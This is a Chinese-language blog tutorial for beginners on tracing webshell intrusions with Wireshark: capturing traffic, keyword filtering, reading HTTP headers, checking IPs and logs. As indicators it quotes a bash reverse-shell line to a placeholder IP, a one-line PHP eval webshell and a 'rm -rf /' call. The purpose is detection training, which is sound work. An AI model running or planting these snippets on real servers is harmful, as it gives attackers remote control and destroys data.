护网行动之流量分析和溯源步骤,从零基础到精通，收藏这篇就够了！

本文链接：https://blog.csdn.net/Libra1313/article/details/147517315

服务器“闹鬼”？可疑文件突然冒头！

刚入行的小白们，别以为服务器运维就是点点鼠标，如果哪天你登录上去，发现下面这些“惊喜”，肾上腺素飙升的时候就到了！

🏆

“野鸡”文件扎堆冒： 突然蹦出一堆 .php、.jsp 后缀的文件，名字还贼拉风，什么 back.php、shell.jsp，简直就差在脸上写着“我是坏人”了。
业务目录“掺沙子”： 本该老老实实放业务代码的目录，冷不丁冒出个 cmd.txt，打开一看，代码长得歪瓜裂枣，跟业务逻辑八竿子打不着。
文件“爆炸式”增长： 一小时冒出一百多个文件？服务器文件增长速度堪比人口爆炸，肯定有问题！

遇到这些情况，别再傻乎乎地以为是程序猿哥哥偷偷加了“彩蛋”。八成是黑客老哥上传了 Webshell，准备在你家服务器上“安家落户”了！Webshell 这玩意儿，说白了就是个远程控制工具，黑客能用它偷数据、改配置，把你服务器当成自己的“后花园”。别慌，下面教你一套“四步捉鬼大法”，揪出背后的“老鼠”！

第一步：生擒流量——菜鸟也能玩转的“抓鬼”姿势

兵器准备： 下载 Wireshark，免费的午餐，不吃白不吃！

这玩意儿是抓包神器，到 Wireshark 中文官网，按你的电脑系统（Windows 或 macOS）下个对应版本。安装过程一路“下一步”，别瞎改设置，保持默认就行。
2. 开始“录像”： 把服务器的网络流量“录下来”！

用你的笔记本电脑连上服务器所在的网络，插网线或者连同一个 Wi-Fi 都行。打开 Wireshark，找到服务器用来上网的网卡。不确定是哪个？那就直接选“全部接口”，简单粗暴！然后点左上角的“开始”按钮，Wireshark 就开始像录像机一样，把服务器所有的网络数据都抓下来了。注意，找到服务器的 IP 地址（比如 192.168.1.100），只抓跟这个 IP 相关的流量，能大大减少数据量，提高效率。
3. 划定“案发”时间： 锁定文件异常的时间段！

假设你发现文件是今天上午 9 点开始“作妖”的。在 Wireshark 里，依次点“查看”→“时间显示格式”，选个具体的时间格式。然后在抓到的包里，随便右键一个流量包，选“设置时间参考”，精准锁定 9 点这个时间，确保抓到的数据覆盖整个“案发”时段。

第二步：关键词“钓鱼”——黑客留下的“蛛丝马迹”

Webshell 和黑客工具，就像特务接头一样，总会用到一些“暗号”。

🍰

eval： 动态代码执行函数，黑客最爱！例如 eval($_POST['cmd'])，让黑客可以通过 POST 方式提交 cmd 参数来执行代码。简直是“开后门”的标配！
z0： 冰蝎木马的“身份证”！流量里频繁出现这玩意儿，绝对要打起十二分精神。
shell： 获取服务器终端权限的“通行证”！比如 exec("bash -i >& /dev/tcp/IP/端口 0>&1")，能把服务器的 bash 终端连到指定的 IP 和端口，实现远程控制。
whoami： 黑客的“验明正身”！看看自己现在是什么身份，能干哪些坏事。

Wireshark “一键搜”——菜鸟也能变猎犬

🐵

在 Wireshark 顶部的过滤栏里，输入 tcp contains "eval"，注意引号必须是英文的。
回车！所有包含 eval 关键词的流量包瞬间现形。
点“统计”→“分组列表”，看看哪个时间段 eval 出现的次数最多。正常情况下，每小时可能只出现 10 次，突然飙升到 200 次？恭喜你，找到“案发现场”了！

“组合拳”搜索——效率提升 N 个 Level

想一次性搜多个关键词？没问题！在过滤栏里输入 tcp contains "eval" or tcp contains "shell"，Wireshark 就能同时筛选出包含 eval 或 shell 的流量包，效率杠杠的！

第三步：锁定“作案现场”——黑客从哪儿下手的？

流量包“三要素”——新手必背口诀！

筛选出可疑流量包后，打开它（一般黄色分组对应 HTTP 请求），重点关注这三个信息：

⚽
1. Host： 目标服务器的域名或 IP 地址。如果出现一个完全陌生的 IP 地址，警惕！
2. Request URI： 请求的页面路径。比如 /user/upload.php，如果发现路径是 /shell.php 这种正常业务里不存在的，99% 有问题。
3. Referer： 请求从哪个页面跳转过来的。正常情况下，应该是从公司官网的相关页面跳转过来。如果这里是空值，或者是一个陌生的网址，大概率是“非法入侵”。
4. 案例分析：恶意请求“一秒现形”
比如你看到这样一条流量记录：

🌅 Host: www.abc.com Request URI: /admin/backdoor.php Referer: http://100.100.100.100/hack.html

这说明有人从 IP 地址 100.100.100.100 的 hack.html 页面，访问了服务器上不存在的 backdoor.php 页面。这极有可能就是 Webshell 在跟服务器“眉来眼去”！
3. HTTPS 解密——别怕，三步搞定！

遇到加密流量（https 协议），也别慌！
1. 找服务器管理员要 SSL 私钥文件（.pem 或 .key 格式）。
2. 在 Wireshark 里，点“编辑”→“首选项”→“Protocols”→“SSL”，把私钥添加进去。
3. 刷新 Wireshark，加密流量就“脱掉马甲”了，随便看！

第四步：揪出“幕后黑手”——IP 和恶意文件，一个都别想跑！

锁定“嫌疑人” IP——三个判断标准！

🌰
1. 看出身： 是不是公司内部 IP？192.168.xxx 这种是内网 IP，47.99.xxx 这种是公网 IP。如果是公网 IP，但不在公司正常的业务访问 IP 列表里，小心！
2. 查黑名单： 打开微步在线网站，把可疑 IP 丢进去搜一下。如果被标记为“恶意 IP”，那就是“黑户”，没跑了！
3. 翻日志： 以 Nginx 服务器为例，日志文件通常在 /var/log/nginx/access.log。打开日志文件，搜可疑 IP。如果发现大量 404 Not Found 记录，说明这个 IP 频繁访问服务器上不存在的页面，很可能是在“试探性攻击”。
4. 检查上传的文件——两招辨别 Webshell！
Webshell 通常藏在 POST 请求里，也就是上传文件的请求里。

🎉
1. 看名字： 后缀名是 .php 或 .jsp，文件名看起来很奇怪，比如 a.php、cmd.jsp、admin_backup.php，嫌疑很大！
2. 看内容： 在 Wireshark 里，右键点击可疑流量包，选“导出分组字节”，保存为文件。用记事本打开，如果看到 eval($_POST、system("rm -rf /")、file_put_contents 这些代码，或者类似 <?php @eval($_POST['z0']); ?> 这种极简代码，基本可以断定这就是 Webshell！